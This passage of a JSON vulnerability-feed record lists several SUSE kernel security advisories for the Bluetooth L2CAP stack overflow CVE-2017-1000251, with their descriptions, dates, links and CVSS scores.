"AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/147076/lineageos141-exec.txt"}], "suse": [{"lastseen": "2017-09-21T17:38:01", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 12 GA kernel was updated to receive the\n following security fixes:\n\n - CVE-2017-1000251: The native Bluetooth stack in the Linux Kernel was\n vulnerable to a stack overflow while processing L2CAP configuration\n responses, resulting in a potential remote denial-of-service\n vulnerability but no remote code execution due to use of\n CONFIG_CC_STACKPROTECTOR. [bnc#1057389]\n\n", "modified": "2017-09-20T21:07:50", "published": "2017-09-20T21:07:50", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-09/msg00076.html", "id": "SUSE-SU-2017:2534-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-09-18T19:53:54", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to receive the\n following security fixes:\n\n - CVE-2017-1000251: The native Bluetooth stack in the Linux Kernel was\n vulnerable to a stack overflow while processing L2CAP configuration\n responses, resulting in a potential remote denial-of-service\n vulnerability but no remote code execution due to use of\n CONFIG_CC_STACKPROTECTOR. [bnc#1057389]\n\n", "modified": "2017-09-18T18:10:04", "published": "2017-09-18T18:10:04", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-09/msg00071.html", "id": "SUSE-SU-2017:2521-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-09-21T23:37:04", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to receive the\n following security fixes:\n\n - CVE-2017-1000251: The native Bluetooth stack in the Linux Kernel was\n vulnerable to a stack overflow while processing L2CAP configuration\n responses, resulting in a potential remote code execution vulnerability.\n [bnc#1057389]\n\n", "modified": "2017-09-21T21:16:32", "published": "2017-09-21T21:16:32", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-09/msg00080.html", "id": "SUSE-SU-2017:2548-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-10-20T16:52:07", "bulletinFamily": "unix", "description": "This update for the Linux Kernel 4.4.82-6_3 fixes one issue.\n\n The following security issue was fixed:\n\n - CVE-2017-1000251: The native Bluetooth stack in the Linux Kernel (BlueZ)\n was vulnerable to a stack overflow vulnerability in the processing of\n L2CAP configuration responses resulting in Remote code execution in\n kernel space (bsc#1057950).\n\n", "modified": "2017-10-20T15:09:28", "published": "2017-10-20T15:09:28", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00050.html", "id": "SUSE-SU-2017:2794-1", "type": "suse", "title": "Security update for Linux Kernel Live Patch 1 for SLE 12 SP3 (important)", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-14T16:58:56", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to receive the\n following security fixes:\n\n - CVE-2017-1000251: The native Bluetooth stack in the Linux Kernel was\n vulnerable to a stack overflow while processing L2CAP configuration\n responses, resulting in a potential remote denial-of-service\n vulnerability but no remote code execution due to use of\n CONFIG_CC_STACKPROTECTOR. [bnc#1057389]\n\n", "modified": "2017-09-14T15:07:24", "published": "2017-09-14T15:07:24", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-09/msg00043.html", "id": "SUSE-SU-2017:2459-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-09-19T01:37:15", "bulletinFamily": "unix", "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to receive the\n following security fixes:\n\n - CVE-2017-1000251: The native Bluetooth stack in the Linux Kernel was\n vulnerable to a stack overflow while processing L2CAP configuration\n responses, resulting in a potential remote denial-of-service\n vulnerability but no remote code execution due to use of\n CONFIG_CC_STACKPROTECTOR. [bnc#1057389]\n\n", "modified": "2017-09-19T00:07:25", "published": "2017-09-19T00:07:25", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-09/msg00072.html", "id": "SUSE-SU-2017:2523-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}]}
